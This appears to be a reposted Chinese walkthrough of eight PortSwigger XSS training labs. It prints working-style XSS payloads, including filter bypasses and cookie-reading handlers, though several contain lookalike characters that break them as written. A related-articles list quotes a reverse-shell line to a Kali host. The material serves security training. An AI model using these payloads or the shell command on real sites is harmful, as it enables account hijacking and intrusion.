burp靶场xss漏洞(中级篇)上

2024-06-17 19:12
文章标签 漏洞 靶场 xss 中级 burp

本文主要是介绍burp靶场xss漏洞(中级篇)上,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

靶场地址

http://portswigger.net/web-security/all-labs#cross-site-scripting

第一关:DOM型(使用document.write函数)

1.点击随机商品后找到搜索框,后在URL中添加storeId查询参数,并输入一个随机字母数字字符串作为其值

2.在浏览器中,注意到随机字符串出现在选项表中

3.更改URL,在storeId参数中插入payload,出现弹窗即可通关

storeId="></select><img%20src=1%20οnerrοr=alert(1)>

第二关:DOM型(<和"的html编码)

1.一打开是熟悉的搜索框,在搜索框中输入随机字符串

2.在源代码查看插入的字符串哪里去了,发现随机字符串被包含在一个ng-app指令中

3.在搜索框中输入以下 AngularJS 表达式,出现弹窗后表示成功通关

{{$on.constructor('alert(1)')()}}

第三关:反射型

1.用Burp抓包,注意字符串反映在名为 search-results 的JSON响应中

2.尝试发现双引号被转义,但是反斜杠不会被转义

3.构造xss payload,出现弹窗即可通关

\"-alert(1) }//

原理:第一个反斜杠不转义,在转义第二个双引号时会添加一个反斜杠,于是产生的两个反斜杠会把转义取消,导致添加的双引号不被转义在结果中显示出来,减号被转义为双引号,后面的右花括号和两个正斜杠提前关闭JSON对象,并注释掉对象的其余部分

响应结构:{"searchTerm":"\\"-alert(1) }//", "results":[ ] }

第四关:存储型

1.在评论区写个评论后查看评论内容所在的位置,发现被包裹在<p>标签中

2.根据提示可知只需在payload开头加入一组尖括号,其后的尖括号将不受影响便可形成攻击

3.出现弹窗成功通关

第五关:反射型(标签过滤)

1.首先插入正常的xss代码观察是否被阻止,出现错误提示

<img src=1 οnerrοr=alert(document.cookie)>

2.使用Burpsuite抓包后测试哪些标记和属性被阻止

3.打开下面网页,复制所有标签

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

4.攻击后得到没有被过滤的是body和customs bags

5.接下来更换攻击位置来确定可以使用什么函数

   复制所有函数

6.攻击后得到没有被过滤的函数

7.最后访问服务器构造不会被WAF过滤的payload

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20οnresize=print()%3E" οnlοad=this.style.width='100px'>

    点击储存后发送给受害者后即可通关

第六关:反射型(屏蔽所有标记)

1.根据提示知道这关会阻止除自定义标记外的所有html标记,先构造自定义标签

<custom-tag οnfοcus='alert(document.cookie)' id='x' tabindex="1">

2.验证该payload是否有效,在URL后注释x,出现弹窗说明可以造成攻击

<custom-tag οnfοcus='alert(document.cookie)' id='x' tabindex="1">#x

3.在服务器中将构造的payload发送给受害者后即可通关

<script> location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28 document.cookie%29%20tabindex=1%3E#x'; </script>

第七关:反射型(使用SVG标记)

1.在搜索框中插入payload,发现被拦截

<img src=1 οnerrοr=alert(111)>

2.使用Burpsuite抓包并分析什么标签导致被拦截

3.打开下面网页,复制所有标签

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

4.攻击后得到没有被过滤的是 animatetransform,、image、svg、title

5.接下来更换攻击位置来确定可以使用什么函数

   复制所有函数

6.得到没有被过滤的函数为onbegin

7.构造不被过滤的payload,出现弹窗即可通关

<svg><animatetransform onbegin='alert(111)'>

第八关:反射型(链接标签)

1.访问以下 URL,将 X 键设置为整个页面的访问键。当用户按下访问键时,就会出现弹窗

https://YOUR-LAB-ID.web-security-academy.net/?%27accesskey=%27x%27οnclick=%27alert(1)

2.触发弹窗(Windows:ALT+SHIFT+X)

这篇关于burp靶场xss漏洞(中级篇)上的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1070312

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

xss-labs-master通关教程

一.level1 先来进行一下代码审计 <?php ini_set("display_errors", 0);//关闭错误显示$str = $_GET["name"]; //接受URL来的get形式的name传参echo "<h2 align=center>欢迎用户".$str."</h2>";//在网页输出,并不是echo执行的,而是echo把HTML代码发送到浏览器,浏览器对发送的H

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

Java反序列化漏洞-TemplatesImpl利用链分析

文章目录 一、前言二、正文1. 寻找利用链2. 构造POC2.1 生成字节码2.2 加载字节码1)getTransletInstance2)defineTransletClasses 2.3 创建实例 3. 完整POC 三、参考文章 一、前言 java.lang.ClassLoader#defineClass defineClass可以加载字节码,但由于defineClas

Web安全之XSS跨站脚本攻击:如何预防及解决

1. 什么是XSS注入 XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,通过注入恶意代码(通常是JavaScript)到目标网站的网页中,以此在用户浏览网页时执行。攻击者可以通过XSS获取用户的敏感信息(如Cookie、会话令牌)或控制用户浏览器的行为,进而造成信息泄露、身份冒用等严重后果。 2. XSS攻击类型 2.1 存储型XSS 存储型XS

【前端安全】浅谈XSS攻击和防范

定义 XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 分类 大分类小分类原理非存储DOM型① 不需要经过服务器

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

2-rec 1.启动环境  cd /.../vulhub/thinkphp/2-rce # cd进入2-rce靶场文件环境下docker-compose up -d # docker-compose启动靶场docker ps -a # 查看开启的靶场信息 2.访问192.168.146.136:8080网页 3.构造payload http

【漏洞复现】赛蓝企业管理系统 GetJSFile 任意文件读取漏洞

免责声明:         本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担

【网络安全】Jenkins任意文件读取漏洞及检测工具(CVE-2024-23897)

原创文章,不得转载。 文章目录 漏洞成因影响范围检测工具更多细节 漏洞成因 Jenkins CLI 接口存在任意文件读取漏洞(CVE-2024-23897)。该问题源于 args4j 库在解析文件名参数时,会将@符号后的字符串视为文件名并尝试读取文件,而且该功能默认处于启用状态。 影响范围 Jenkins weekly <= 2.441 Jenkins LTS <=